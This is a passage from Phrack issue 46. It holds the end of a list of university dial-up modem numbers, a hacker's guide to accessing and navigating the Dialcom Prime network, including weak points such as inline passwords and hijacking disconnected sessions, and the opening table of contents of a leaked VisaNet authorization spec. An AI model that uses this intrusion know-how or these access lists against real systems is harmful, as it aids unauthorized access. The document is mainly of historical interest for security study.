602-435-3444    MARICOPA.EDU

602-965-7860    ASU.EDU

603-643-6300    DARTMOUTH.EDU

604-753-3245    MALPITA.EDU

606-622-2340    EKU.EDU

606-257-1232    UKY.EDU
        1353
        1361
        1474
        2836
        4244
        5627
    258-1996
        2400
        1200
    323-1996
        2400
        2700

609-258-2630    PRINCETON.EDU

609-896-3959    RIDER.EDU

610-683-3692    KUTZTOWN.EDU

612-626-1920    UMN.EDU
        2460
        9600

614-292-3103    OHIO-STATE.EDU
        3112
        3124
        3196

614-593-9124    OHIOU.EDU

615-322-3551    VANDERBILT.EDU
        3556
    343-0446
        1524

615-372-3900    TNTECH.EDU

615-974-3201    UTK.EDU
        4282
        6711
        6741
        6811
        8131

616-394-7120    HOPE.EDU

617-258-7111    MIT.EDU
    257-6222

617-287-4000    UMB.EDU
    265-8503

617-353-3500    BU.EDU
        4596
        9118
        9415
        9600

617-373-8660    NEU.EDU

617-437-8668    NORTHEASTERN.EDU

617-495-7111    HARVARD.EDU

617-727-5920    MASS.EDU

619-292-7514    UCSD.EDU
    436-7148
    452-4390
        4398
        8280
        8238
        9367
    453-9366
    480-0651
    534-5890
        6900
        6908
    558-7047
        7080
        9097

619-594-7700    SDSU.EDU

619-752-7964    CSUSM.EDU

702-895-3955    UNLV.EDU

703-831-5393    RUNET.EDU

703-993-3536    GMU.EDU

707-664-8093    CALSTATE.EDU
    822-6205

707-826-4621    HUMBOLDT.EDU

708-467-1500    NWU.EDU

713-749-7700    UH.EDU
        7741
        7751

714-364-9496    CALSTATE.EDU

714-773-3111    FULLERTON.EDU
    526-0334

714-856-8960    UCI.EDU

716-273-2400    ROCHESTER.EDU

716-645-6128    BUFFALO.EDU

719-594-9850    UCCS.EDU
    535-0044

801-581-5650    UTAH.EDU
        8105
    585-4357
        5550

803-656-1700    CLEMSON.EDU

804-594-7563    CNU.EDU

804-924-0577    VIRGINIA.EDU
    982-5084

805-549-9721    CALSTATE.EDU
    643-6386

805-664-0551    CSUBAK.EDU

805-756-7025    CALPOLY.EDU

805-893-8400    UCSB.EDU

806-742-1824    TTU.EDU

808-946-0722    HAWAII.EDU
    956-2294

810-939-3370    UMICH.EDU

812-855-4211    INDIANA.EDU
        4212
        9656
        9681
    944-8725
        9820
    945-6114

814-269-7950    PITT.EDU
        7970
    362-7597
        7558
    827-4486

814-863-0459    PSU.EDU
        4820
        9600
    865-2424

816-235-1491    UMKC.EDU
        1492
        1493
        6020

818-701-0478    CSUN.EDU

901-678-2834    MEMST.EDU

904-392-5533    UFL.EDU

904-646-2772    UNF.EDU
        2735

906-487-1530    MTU.EDU

907-474-0772    ALASKA.EDU
    789-1314

908-571-3555    MONMOUTH.EDU

908-932-4333    RUTGERS.EDU

909-595-3779    CSUPOMONA.EDU

909-595-5993    CALPOLY.EDU
    598-7104

909-621-8233    HMC.EDU

909-621-8455    POMONA.EDU
        8332

909-621-8361    CLAREMONT.EDU
        8313
        8108
        8509

909-880-8833    CSUSB.EDU

913-864-5310    UKANS.EDU
    897-8650
        
916-456-1441    CSUS.EDU
    737-0955

916-752-7900    UCDAVIS.EDU
        7920
        7950

916-894-3033    CSUCHICO.EDU

919-681-4900    DUKE.EDU

919-759-5814    WFU.EDU

919-962-9911    UNC.EDU

-----------------------------------------------------------------------------

Canada

204-275-6100    umanitoba.ca
        6132
        6150
306-586-5550    University of Regina
306-933-9400    University of Saskatchewan
403-492-0024    University of Alberta
        0096
        3214
416-978-3959    University of Toronto
        8171
418-545-6010    Universite du Quebec a Chicoutimi
418-656-7700    laval u
        3131
        5523
506-453-4551    University of New Brunswick
        4560
        4609
    452-6393
514-285-6401    uquebec.ca
514-340-4449    polymtl.ca
        4450
        4951
    343-2411
514-398-8111    McGill University
        8211
        8711
514-733-2394    Universite de Montreal
        1271
        0832
514-343-2411
        7835
514-848-8800    concordia.ca
        7494
        8828
        4585
        8834
        7370
519-661-3511    University of Western Ontario
        3512
        3513
519-252-1101    Windsor University
519-725-5100    University of Waterloo
        1392
604-291-4700    simon fraser u
        4721
        5947
604-721-2839    univ of victoria
        6148
604-822-9600    University of British Columbia
613-788-3900    Carleton University
    564-5600
613-548-8258    Queen's University
    545-0383
613-564-3225    University of Ottawa
        5926
613-230-1439    York University
705-741-3350    Trent University
        3351
        4637
709-737-8302    Memorial Univ. of Newfoundland
807-346-7770    Lakehead University
819-569-9041    usherb.ca
    821-8025
819-822-9723    bishop u
819-595-2028    Universite du Quebec a Hull
902-542-1585    acadiau.edu
902-425-0800    tuns.ca
    420-7945
902-429-8270    Saint Mary's University
902-494-2500    Dalhousie University
        8000
902-566-0354    University of Prince Edward Island
905-570-1889    McMaster University
        1046

-----------------------------------------------------------------------------

The Rest of the World

31-40-435049    tue.nl
      455215
      430032
34-1-582-1941   Facultad de Odontologia
   3-333-9954   Barcelona Polytechnic
         8991   Univ of Barcelona
     581-2091
     691-5881   Polytechnic University
34-7-656-6553   Univ of Zaragosa
         0108
         6654
44-3-34-2755    st-andrews.ac.uk
44-71-413-0790  birkbeck college
44-524-843878   lancashire
44-785-214479   staffs.ac.uk
49-621-292-1020 uni-mannheim.de
       121-0251
49-631-205-2150 uni-kl.de
           3554
           3629
           3630
49-8421-5665    ku-eichstett.de
49-8452-70035   tu-muenchen.de
61-8-223-2657   Univ of Adelaide
61-9-351-9544   Curtin U
61-9-381-1630   uwa.edu.au
         2200
         3054
82-2-962        kaist.ac.kr
886-2-363-9529  NAT TECH U, TAIWAN


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 14 of 28

****************************************************************************

              A   L I T T L E   A B O U T   D I A L C O M
              *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

                                   by

                               Herd Beast

                          (hbeast@phantom.com)

Introduction
~~~~~~~~~~~

Dialcom is an interesting system for hackers for two reasons:
First, it is used by business people, reporters and many other world
wide, and it offers a variety of information services, from a
bulletin board to stock market updates and news services.  Second,
Dialcom runs on Prime machines, so using Dialcom is a good way to
learn Prime.  True, it's not the best, as access is generally restricted,
but it's better than, say, learning VMS from Information America.

In these days, where everyone seems to be so centered about the
Internet and the latest Unix holes, it's important to remember that the
information super-highway is not quite here, and many interesting things
are out there and not on the Internet.  Phrack has always been a good place
to find out more about these things and places, and I wrote this article
after reading the Dialog articles in Phrack.

Well, gentle reader, I guess that my meaning-of-life crap quota is full,
so let's move on.

Accessing Dialcom and Logging In
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Dialcom is accessible world-wide.  It offers connection to Tymnet, Sprintnet,
and other networks as well as dialin modems.  Since I am not writing to
Washington people only, I will specify only the easiest methods -- Tymnet
and Sprintnet -- and some of the more interesting access methods.

Dialcom is basically a Primecom network.  Each user has an account on
one or more of the systems connected to that network.  To access Dialcom,
the user needs to access the machine his account is on.  First, he logs
into a public data network and follows the steps required to connect to
a remote note.  On Tymnet, this means getting to the "please log in:"
prompt, and on Sprintnet it's the famous '@' prompt.

For Tymnet, you must enter at the prompt: DIALCOM;<system number>
(eg, DIALCOM;57).  The same goes for TYMUSA connection from outside
the USA.

For Sprintnet or other PADs, you must enter the correct NUA:

   System #         Sprintnet NUA         Tymnet NUA
   ========         =============        =============
     XX             3110 301003XX        3106 004551XX
   (32, 34,
    41 - 46,
    50, 52,
    57, 61,
    63, 64)

It should be noted that Dialcom keeps its own X.25 network, Dialnet,
and the NUAs on it are those of the systems (connect to address "57"
for system 57).

Dialcom has other access methods, meant to be used from outside the
USA, but sometimes available from within as well.

One is a COMCO card, which is inserted into a reader connected to the
computer and the modem through a serial link.  The user then calls a
special dial-up number, and can connect to Dialcom (or any other NUA).
The card contains a number of "tax units" which are deducted as the
connection goes through, until they are exhausted and the card is useless.
The user calls the dial-up and types in ".<CR>".  The amount of tax units
on the card will then appear on the screen, and the user can connect to a
host.  COMCO dial-ups:

                Location                                Number
          =======================                   ==============
          Australia                                 +61-02-2813511
          Belgium                                   +32-02-5141710
          France                                    +33-1-40264075
          West Germany                              +49-069-290255
          Hong Kong                                 +852-5-8611655
          Netherlands                               +31-020-6624661
          Switzerland                               +41-022-865507
          United Kingdom                            +45-01-4077077
          USA (Toll Free)                           +1-800-777-4445
          USA                                       +1-212-747-9051

The other way is through Infonet.  I will not turn this into an Infonet
guide, save to write the logon sequence needed to access Dialcom.
At the '#' prompt, enter 'C'.  At the "Center:" prompt, enter "DC".
Dialcom NUAs are 31370093060XX, where XX is the system number.

Once the connection to a Dialcom system has been established, you will
be greeted by the Prime header:

Primecom Network 19.4Q.111 System 666

 Please Sign On
>

And the '>' prompt.  This is a limited prompt as most commands cannot
be issued at it, so you need to login.

Dialcom user id's are typically 3 alphabetic characters followed by
several digits.  The password may contain any character except for
",;/*" or spaces, and my experience shows that they tend to be of
intermediate complexity (most will not be found in a dictionary, but
could be cracked).

Password security may become useless at this point, because the Dialcom
Prime systems allow ID to take both user id and password as arguments
(which some other Primes do not) and in fact, Dialcom tutorials tell
users to log on like this --

>ID HBT007 IMEL8

-- which makes ``shoulder surfing'' easier.

One you log on, you will see:

Dialcom Computer Services 19.4Q.111(666)
On At 14:44 07/32/94 EDT
Last On At 4:09 06/44/94 EDT

>

And again, the '>' prompt.

>off
Off At 14:45 07/32/94 EDT
Time used: 00h 00m connect, 00m 01s CPU, 00m 00s I/O.

Security at Dialcom
~~~~~~~~~~~~~~~~~~

As mentioned, while passwords are relatively secure, the manner in
which they are entered is usually not.

As for the accounts themselves, it's important to understand the
general way accounts exist on Dialcom.  Dialcom users are usually
part of a business that has an ``account group'' on Dialcom.  Each
user gets an account from that group (HBT027, HBT054).  Each group
also has a group administrator, who controls what each account can
access.  The administrator determines which programs (provided by Dialcom)
each user can access.  A foreign correspondent for a magazine might
have access to the news services while other users might not.  The
administrator also determines how much the user can interface with
the Prime OS itself.  Each user can run a few basic commands (list
files, delete, sign off) but above that, it's up to the administrator.
The administrator may opt to remove a user from the controlling menuing
system -- in which case, the user has no restrictions forced upon him.

Group administrators, however, handle only their groups, and not the
Dialcom system.  They need, for example, to notify Dialcom staff if
they want an account removed from the system.

Another (different yet combined) part of the account/group security
are accounts' ``security levels'' (seclevs).  Seclevs range from 3
to 7, and determine the access an account has to various places.
Seclev 4 users, for example, are not restricted to seeing only users
of their group on the system, and can delete accounts from the menuing
system.

User accounts own their directories and files within (but high seclevs
can read other users' files).  Each account's security is left in some
extent to its owner, in that the user sets his own password.  When
setting a password, a user can set a secondary password.  Any user wishing
to access that user's directory will need that password.  Furthermore,
the user can allow other users to attach as owners to his directory if
they know his password (come to think of it, couldn't they just login
as him?).  This is all controlled by the PASSWD program (see ``Common
Commands'', below).

Dialcom also allows for login attempt security using the NET_LOCK
program.  NET_LOCK blocks login attempts from addresses that have
registered too many login failures over a period of time (the default
being blocking for 10 minutes of addresses that have registered more
than 10 failed login within 5 minutes).  NET_LOCK -DISPLAY is accessible
to users of Seclev 5 and shows addresses currently blocked and general
information.  Other options are accessible to Seclev 7 and are:
-ON, -OFF, -ATTEMPTS (number of attempts so that NET_LOCK will block
an address), -LOCK_PERIOD (the period in which these attempts must
occur), -LOCK_TIME (time to block), -WINDOW (a time window in which the
lockout feature is disabled).

A little unrelated is the network reconnect feature of the Prime
computers.  When a user gets disconnected from the system because
of a network failure, or for any other reason which is not the
system's fault, he can log back in and reconnect into the disconnected
job.  When this happens, the user sees, upon logging on:


You Have a Disconnected Job:

  HBT007               d09   1  109   NT   NETLINK  989898989    6 3

Do You Want to Reconnect?

Which means user's HBT007 job #9 (a NETLINK command) is waiting for
a reconnection.  At this point, the user can continue, leaving the
job to hang until the system signs it off when a certain amount of
time expires; sign the job off himself; or reconnect to that job.
(Try "HELP" at the prompt.)  This wouldn't be important, but experience
shows that many disconnections occur when someone logs into Dialcom
over a network, and then uses NETLINK (or another program) to connect
to another site over a network, and somewhere, some time, he issues
a control sequence (let's say to tell NETLINK to do something) that
gets processed by the first network, which logs him off.  So there
is potential to log into the middle of people's sessions (yeah, like
detached ttys).

Common Commands
~~~~~~~~~~~~~~

Common commands are in reality the basic Prime commands that every
account has access to.  Here they are, in alphabetical order.

`CLEAR' Clear the screen.

`DATE'  Shows the date at which a command was entered.  Output:

        >DATE
        Proceed to next command

        >BAH

        Friday, June 38, 1994 10:01:00 AM EDT

`DEL'   Deletes a file.

`DELP'  Deletes several files based on wildcards.  Can verify deletion
        of every file, and delete only file modified before, after, or
        between certain dates.

`ED'    Is the default and simplest file editor on Dialcom (some of its
        brothers are JED and FED).  Once invoked, ED enters INPUT mode,
        in which the user just types text.  To enter EDIT mode, where
        you can issue commands, you need to press <CR> on a blank line
        (the same thing will get you from EDIT mode back to INPUT mode).
        The EDIT mode uses a pointer to a line.  All commands are carried
        on the line that the pointer points to.  "T" will bring the
        pointer to the top of the text, "B" to the bottom, "N" to the
        next line down, "U" to the next line up, and "L <word>" to
        the line containing <word>.  ED commands include:

        P:     PRINT the pointer line.  P<number> will print <number>
               of lines.
        C:     Change words.  The format is "C/old word/new word".
        A:     Appends words.  The format is "A <words>".
        R:     Retype pointer line.  The format is "R <new line>".
        SP:    Check the spelling of the text, and then point to
               the top of the text.
        SAVE:  Will save the text and exit ED.
        Q:     Will quit/abort editing and exit ED.

`F'     List all file info.  Output:

        DIALCOM.TXT  001  13/30/94  13:50  ASC  D W R

        Which means file name "DIALCOM.TXT", size of 1 file blocks,
        lat modified on 13/30/94 at 13:50, is an ASC type file, and
        the account has the permissions to D(elete), W(rite), and
        R(ead) it.

`HELP' (`?')  Displays a nicely formatted menu of available commands.

`INFO'  System info.  INFO <info-file-name> displays an information
        file, for example, INFO NETLINK.

        "INFO ?" lists info files.
        "INFO BRIEF" lists info files grouped by application
        "INFO INFO" lists info files with their descriptions.

`L'     List all file names.  Output:

        <S666-6>HBT007 (Owner)

        DIALCOM.TXT

`LS'    Display information about available segments and the account's
        access to them.  Output:

        2 Private static segments.
        segment access
        --------------
        4000    RWX
        4001    RWX

        11 Private dynamic segments.
        segment access
        --------------
        4365    RX
        4366    RX
        4367    RWX
        4370    RWX
        4371    RX
        4372    RWX
        4373    RX
        4374    RWX
        4375    RX
        4376    RX
        4377    RWX

`NAME'  Changes UFD name.  Output:

        >NAME

        Old Name: John Gacy
        UFD Name: Herd Beast
        All done

        >WHO

        Herd Beast <S666-6>HBT007

`NETWORK'  Accesses a database that contains dial-up number for Sprintnet,
           Tymnet, Datapac and Dialcom's Dialnet by State/City.

`OFF'   Sign off the system.

`ONLINE' Who's online?  The amount of data displayed depends on the
         account's seclev.  Seclevs below 4 are restricted to seeing
         only users of their group.  Output:

         HBT007      PRK017      MJR

`PAD'   Allows you to send commands to an X.29 PAD, these commands
        being the SET/SET?/PAR? commands and their parameter/value
        pairs.

`PASSWD' Change your password.  PASSWD has two forms: a short one,
         which just changes the user's password, and a long form,
         invoked by PASSWD -LONG, which allows the user to set
         a second password for other users accessing his directory,
         and also to determine if they can have owner access to
         the directory.

`PROTECT'  Protects a file (removes permissions from it).

           "PROTECT DIALCOM.TXT" will remove all three (D, W, R)
           attributes from it.  This will result in:

           >DEL DIALCOM.TXT
           Insufficient access rights.  DIALCOM.TXT (DEL:10)

           But --

           >DELETE DIALCOM.TXT
           "DIALCOM.TXT" protected, ok to force delete? y

`SECLEV' Your security level.  Output:

         Seclev=5

`SIZE'  Size information about a file.  Output:

        1 Block, 404 Words

`STORAGE'  Shows storage information.

`SY'    Show users on system.  (Same restrictions as for ONLINE apply.)
        Will show user name, time on, idle time, devices used, current
        jobs and state, etc.  Output:

    41 Users on sys 666

 Names    use idle mem State command    object    devs

 HBT007   *11   0  155   R1   SY                   6 3  from Tymnet via X.25


`SYS'   Displays account information and system number.  Output:

        <S666-6>HBT007  on system 666.

`TERM'  Used to tell the Dialcom computer what terminal the user is
        using.  A list of supported terminals is generated by "TERM
        TERMINALS".  TERM options are:

        TYPE <terminal type>         (TYPE VT100)
        WIDTH <width>                (Terminal width, if different
                                      than default)
        TOP                          (Start listings at top of screen)
        PAUSE                        (Pause listings when screen is
                                      full)

        -ERASE, -KILL <char>         (Sets the erase or kill character)
        -BREAK <ON|OFF>              (Enables or disables BREAKs)
        -HALF or -FULL               (Half duplex of full duplex)
        -DISPLAY                     (Output current terminal information)

`WHO'   Displays account information.  Output:

        <S666-6>HBT007

        Which means user HBT007 on system 666 on device 6.

Communicating on Dialcom
~~~~~~~~~~~~~~~~~~~~~~~

Users who want to communicate on Dialcom have two choices, basically.
These are the Dialcom bulletin board and electronic mail.  The Dialcom
bulletin board has two versions.  The first consists of several message
bases (called ``categories'') which are shared between some Dialcom
systems (and mostly used by bored employees, it seems); there are also
private bulletin boards, which are not shared between the systems.  They
belong to account groups, and only users in an account group can access
that group's bulletin board system.  These version of the Dialcom board
are often empty (they have no categories defined and hence are unusable).

This is accessed by the command POST (PRPOST for the private board).
Once POST is activated, it will display a prompt:

Send, Read or Purge:

If the answer is READ, POST will ask for a category (a list of categories
will be displayed if you type HELP at that prompt).  Once a category
has been joined, you will be able to read through the messages there:

Subject:  ?
From:  HBT007             Posted:  Sat  32-July-94  16:47    Sys 666

quit
/q
/quit

Continue to Next Item?

Answering SEND at the first prompt will allow you to send a message in a
category.

Answering PURGE will allow you to delete messages post by your account.
When you enter PURGE and the category to purge message from, the system
will show you any posts that you are allowed to purge, followed by a
"Disposition:" prompt.  Enter DELETE to delete the message.

The second way to communicate is the Dialcom MAIL system.  MAIL allows
sending and receiving messages, it allows for mailing lists, filing
mail into categories, holding mail to read later and so on.  MAIL is
invoked by entering, uh... oh, yes, MAIL.

It works along similar lines to those of POST, and will display the following
prompt:

Send, Read or Scan:

SEND:  Allows you to send a message.  It will prompt with "To:",
"Subject:" and "Text:" (where you enter the actual message, followed
by ".SEND" on a blank line to end).  After a message is sent, the
"To:" prompt will appear again -- use "QUIT" to leave it.

A word about the "To:" prompt.  There are two configuration files which
make its use easier.  First the MAIL.REF file, which is really a mailing
list file.  It contains entries in the format of --

        <Nick> <Accounts>
        DOODZ DVR014 ABC0013 XYZ053

-- and at the "To:" prompt, you can just enter "DOODZ" and the message
will be sent to all three accounts.  When you enter a name, MAIL searches
through your MAIL.REF, and then through the account administrator's, and
only then parses it as an account name.  Second is the mail directory,
which contains the names and account IDs of many users the account is
in contact with.  To display it, type "DIS DIR" at the first prompt.
You'll get something like this:

HERD-BEAST            6666:HBT007      WE'RE BAD AND WE'RE KRAD

Which means you can type "HERD-BEAST" at the prompt, and not just
HBT007.  Also, there are special options for the "To:" prompt, most
notable are: CC to send a carbon copy; EX to send the message with
``express priority''; DAR to request that if the message is sent
to a user on another Dialcom system, POSTMASTER will send you a
message verifying that your message has been sent; and NOSHOW,
to keep the receiver from seeing everybody else on the "To:" list.
For example (all these people are in the mail directory),

        To: DUNKIN D.DREW CC FOLEY NOSHOW EX

You enter the message about to be sent at the "Text:" prompt.  That
mode accepts several commands (like .SEND), all of which begin with a
dot.  Any command available at the "To:" prompt is available here.
For example, you can add or remove names from to "To:" field using
".TO <ids>" or ".TO -<ids>", and add a CC using ".CC <id>".
You also have a display command, ".DIS".  ".DIS" alone shows the text
entered so far; ".DIS TO" shows the "To:" field; ".DIS HE" shows
the entire header; etc.  Finally, you have editing option.  ".ED" will
load editing mode, so you can change the text you entered.  ".LOAD
<filename>" will load <filename> into the text of the message.  ".SP"
will check the spelling of text in the message, and there are other
commands.

READ:  Allows you to read mail in your mailbox.  Once you enter READ,
MAIL will display the header of the first message in your mailbox
(or "No mail at this time") followed by a "--More--" prompt.  To
read the message, press <CR>; otherwise, enter NO.  After you are done
reading a message, you will be prompted with the "Disposition:" prompt,
where you must determine what to do with the message.  There you can enter
several commands:  AGAIN to read the message again;  AG HE to read the
header again; AP REPLY to reply to the message and append the original
message to the reply; AP FO to forward the message to someone and add
your comments to it; REPLY to reply to the sender of the message; REPLY
ALL to reply to everybody on the "To:" field; FILE to file the message;
SA to save the message into a text file; NEXT to read the next message
in your mailbox; and D to delete the message.

SCAN:  Allows you see a summary of the messages in the mailbox.  Both
READ and SCAN have options that allow you to filter the messages you
want to read:  FR <ids> to get only messages from <ids>; TO <ids> to
get only messages sent to <ids>; 'string' to get only messages containing
``string'' in the "Subject:" field; "string" to get only messages
containing ``string'' in the message itself; FILE CATEGORY to get only
messages filed into ``CATEGORY''; and DA Month/Day/Year to get only messages
in that date (adding a '-' before or after the date will get you everything
before or after that date, and it's also possible to specify two dates
separated by a '-' to get everything between those dates.  For example,
to get all of Al Gore's messages about Clipper before August 13th:

        READ FILE CLIPPER FR GOR 'Great stuff' DA -8/13/94

There is also a QS (QuickScan) command that behaves the same as SCAN,
only SCAN shows the entire header, and QS just shows the "From:" field.

However, there is more to do here than just send, read or scan.
Some of it was mentioned when explaining these commands.  Both sent
and received messages can be saved into a plain text file or into
a special mailbox file, called MAIL.FILE.  Messages filed into the
MAIL.FILE can be grouped into categories in that file.

SAVING MESSAGES:  Messages are saved by entering "SA filename" at a
prompt.  For sent message, it's the "Text:" prompt, while entering the
message, and the command is ".SA", not "SA".  For received message, it's
either the "--More--" or the "Disposition:" prompt.

FILING MESSAGES:  Messages are filed in two cases.  First, the user
can file any message into any directory, and second, the system files
read messages that lay in the mailbox for over 30 days.  Received messages
are filed by entering "FILE" at the "Disposition:" prompt.  This files
the message into a miscellaneous category called BOX.  If an optional
<category-name> is added after "FILE", the message will be filed into
that category.  If <category-name> doesn't exist, MAIL can create it
for you.  After a message has been filed, it's not removed from the
mailbox -- that's up to the user to do.  Sent messages behaved the same
way, but the command is ".FILE" from the "Text:" prompt.

To display categories of filed mail, enter DIS FILES at a prompt.  To
read or scan messages in filed, just add "FILE <category-name> after
the command (READ, SCAN, etc).  To delete a category, enter D FILE
<category-name>.  To delete a single message in a category, just use
D as you would on any other message, after you read it from the
MAIL.FILE.

Connecting via Dialcom
~~~~~~~~~~~~~~~~~~~~~

Dialcom allows its customers to access other systems through it.
There are some services offered specifically through Dialcom, such as
the BRS/MENUS service, which is an electronic library with databases
about many subjects, Telebase's Cyclopean Gateway Service, which offers
access to many online database services (like Newsnet, Dialog and even BRS)
and more.  These services have a direct connection to Dialcom and software
that maps Dialcom user ids to their own ids (it's not usually possible for
someone to access one of these services without first connecting to Dialcom).

Another method is general connection to X.25 addresses.  Since Dialcom
is connected to X.25, and it allows users to use the Prime NETLINK
commands, it's possible to PAD out of Dialcom!!#!

NETLINK is invoked by entering NETLINK.  NETLINK then displays its own,
'@' prompt.  The commands available there are QUIT, to quit back to
the OS; CONTINUE, to return to an open connection; CALL, to call an
address; and D, to disconnect an open connection.

CALL takes addresses in several formats.  A system name, to connect to
a Dialcom system, or an address in the format of DNIC:NUA.  For example,

@ CALL :666
Circuit #1
666 Connected
[...]

@ CALL 3110:21300023
Circuit #2
21300023 Connected
[...]

NETLINK establishes connections in the form of circuits.  A circuit can
be broken out of into command mode (the '@' prompt), using "<CR>@<CR>",
and another can be opened, or parameters can be changed, etc.
NETLINK has other commands, to log connections into a file, or set PAD
parameters (SET, PAR), or turn on connection debugging, or change
the default '@' prompt, and more.

Things to Do on Dialcom
~~~~~~~~~~~~~~~~~~~~~~

Much of what Dialcom offers was not covered until now and will not
be covered.  That's because most the services could use a file each,
and because many account groups have things enabled or disabled
just for them.  Instead, I will write shortly about two of the more
interesting things online, the news service and clipping service,
and add pointers to some interesting commands to try out.

The news service, accessed with the NEWS command, is a database of
newswires from AP, Business Wire, UPI, Reuters and PR Newswire.
The user enters the database, and can search for news by keywords.

After entering NEWS, you will see a menu of all the news agencies.
Once you choose an agency, you will enter its menu, which sometimes
contains a copyright warning and terms of usage and also the list
of news categories available from that agency (National, North America,
Business, Sports, etc).  Once you choose the category, you will be
asked for the keyword to search for.  If a story (or several stories) was
found containing your desired keyword, you can read through the
stories in the order of time, or the order they appear, or reverse
order and so on, and finally mail a story to yourself, or enter new
search keywords, or jump to another story, or simply quit.

The news clipping service, available with the command NEWSTAB, allows
the user to define keyword-based rules for selecting news clippings.
The system then checks every newswire that passes through it, and if
it matches the rules, mails the newswire to the user.

After entering NEWSTAB, you are presented with a menu that allows you
to show, add, delete, and alter your rules for choosing news.  The rules
are made using words or phrases, logical operators, wildcards and
minimal punctuation.  A rule can be as simple as "HACKING", which will
get every newswire with the word "hacking" in it mailed to you, or
if you want to be more selective, "NASA HACKING".  Logical operators
are either AND or OR.  For example, "HACKING AND INTERNET".  Wildcards
are either '*' or '?' (both function as the same).  They simple replace
any number of letters.  Punctuation is permitted for initials,
abbreviations, apostrophes or hyphens, but not for question marks and
similar.  All of this is explained in the NEWSTAB service itself.

For the file hungry, Dialcom offers several file transfer programs,
including KERMIT and Dialcom's FT, which implements most popular
protocols, like Zmodem, Xmodem, etc.

A small number of other fun things to try:

NET-TALK        The ``interactive computer conferencing system'' -- build
                your private IRC!

CRYPTO          Dialcom's encryption program.  Something they're probably
                going to love on sci.crypt.

NUSAGE          By far one of the better things to do on Dialcom, it was
                left out of this file because it is simply huge.  This
                program allows the user (typically an administrator) to
                monitor network usage, sort the data, store it, peek
                into all the little details (virtual connection types,
                remote/local addresses, actions, time, commands, etc).
                Unfortunately, it's completely beyond the scope of this
                file, as there are tons of switches and options to use
                in order to put this program to effective use.
 


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 15 of 28

****************************************************************************

                            visanetoperations; part1

                              obtainedandcompiled

                                       by

                                     icejey
                                       /\
   lowerfeldafederationforundercasing iiu delamolabz chuchofthenoncomformist
                                       &&
                         theilluminatibarbershopquartet

 greetz2; drdelam maldoror greenparadox kaleidox primalscream reddeath kerryk
-------------------------- [ typed in true(c) 80 columns] ----------------------
---------------------------- [ comments appear in []s ] ------------------------

                                [ section one ]
                            [ from the word of god ]

          -------------------------------------------------------------
          |  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  |
          |  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  |
          |    \\\\\     /////  /////  //////////// /////\\\\         |
          |     \\\\\   /////  /////  /////        /////  \\\\\       |
          |      \\\\\ /////  /////  ///////////  \\\\\\\\\\\\\\      |
          |       \\\\\///   /////        /////  \\\\\\\\\\\\\\\\     |
          |        \\\\\/   ///// ////////////  /////        \\\\\    |
          |  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  |
          |  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  |
          -------------------------------------------------------------

                        EXTERNAL INTERFACE SPECIFICATION
                        --------------------------------
                               SECOND GENERATION
                          AUTHORIZATION RECORD FORMATS

                               For Record Formats
                           --------------------------
                                J - PS/2000 REPS
                             G - VisaNet Dial Debit

1.0 INTRODUCTION

 2.0 APPLICABLE DOCUMENTS
    2.01 RELATED VISA DOCUMENTS FOR AUTHORIZATION
    2.02 RELATED VISA DOCUMENTS FOR DATA CAPTURE

3.0 AUTHORIZATION RECORD FORMATS
    3.01 REQUEST RECORD FORMAT
    3.02 RESPONSE RECORD FORMAT

4.0 REQUEST RECORD DATA ELEMENT DEFINITIONS
    4.01 RECORD FORMAT
    4.02 APPLICATION TYPE
    4.03 MESSAGE DELIMITER
    4.04 ACQUIRER BIN
    4.05 MERCHANT NUMBER
    4.06 STORE NUMBER
    4.07 TERMINAL NUMBER
    4.08 MERCHANT CATEGORY CODE
    4.09 MERCHANT COUNTRY CODE
    4.10 MERCHANT CITY CODE
    4.11 TIME ZONE DIFFERENTIAL
    4.12 AUTHORIZATION TRANSACTION CODE
    4.13 TERMINAL IDENTIFICATION NUMBER
    4.14 PAYMENT SERVICE INDICATOR
    4.15 TRANSACTION SEQUENCE NUMBER
    4.16 CARDHOLDER IDENTIFICATION DATA
    4.17 ACCOUNT DATA SOURCE
    4.18 CUSTOMER DATA FIELD
       4.18.1 TRACK 1 READ DATA
       4.18.2 TRACK 2 READ DATA
       4.18.3 MANUALLY ENTERED ACCOUNT DATA (CREDIT CARD)
          4.18.3.1 MANUALLY ENTERED ACCOUNT NUMBER
          4.18.3.2 MANUALLY ENTERED EXPIRATION DATE
       4.18.4 CHECK ACCEPTANCE IDENTIFICATION NUMBER
          4.18.4.1 CHECK ACCEPTANCE ID
          4.18.4.2 MANUALLY ENTERED CHECK ACCEPTANCE DATA
    4.19 FIELD SEPARATOR
    4.20 CARDHOLDER IDENTIFICATION DATA
       4.20.1 STATIC KEY WITH TWENTY THREE BYTE CARDHOLDER ID
       4.20.2 STATIC KEY WITH THIRTY TWO BYTE CARDHOLDER ID
       4.20.3 DUK/PT KEY WITH THIRTY TWO BYTE CARDHOLDER ID
       4.20.4 ADDRESS VERIFICATION SERVICE DESCRIPTION [hmmm...]
    4.21 FIELD SEPARATOR
    4.22 TRANSACTION AMOUNT
    4.23 FIELD SEPARATOR
    4.24 DEVICE CODE/INDUSTRY CODE
    4.25 FIELD SEPARATOR
    4.26 ISSUING INSTITUTION ID/RECEIVING INSTITUTION ID
    4.27 FIELD SEPARATOR
    4.28 SECONDARY AMOUNT (CASHBACK)
    4.29 FIELD SEPARATOR
    4.30 MERCHANT NAME
    4.31 MERCHANT CITY
    4.32 MERCHANT STATE
    4.33 SHARING GROUP
    4.34 FIELD SEPARATOR
    4.35 MERCHANT ABA NUMBER
    4.36 MERCHANT SETTLEMENT AGENT NUMBER
    4.37 FIELD SEPARATOR
    4.38 AGENT NUMBER
    4.39 CHAIN NUMBER
    4.40 BATCH NUMBER
    4.41 REIMBURSEMENT ATTRIBUTE
    4.42 FIELD SEPARATOR
    4.43 APPROVAL CODE
    4.44 SETTLEMENT DATE
    4.45 LOCAL TRANSACTION DATE
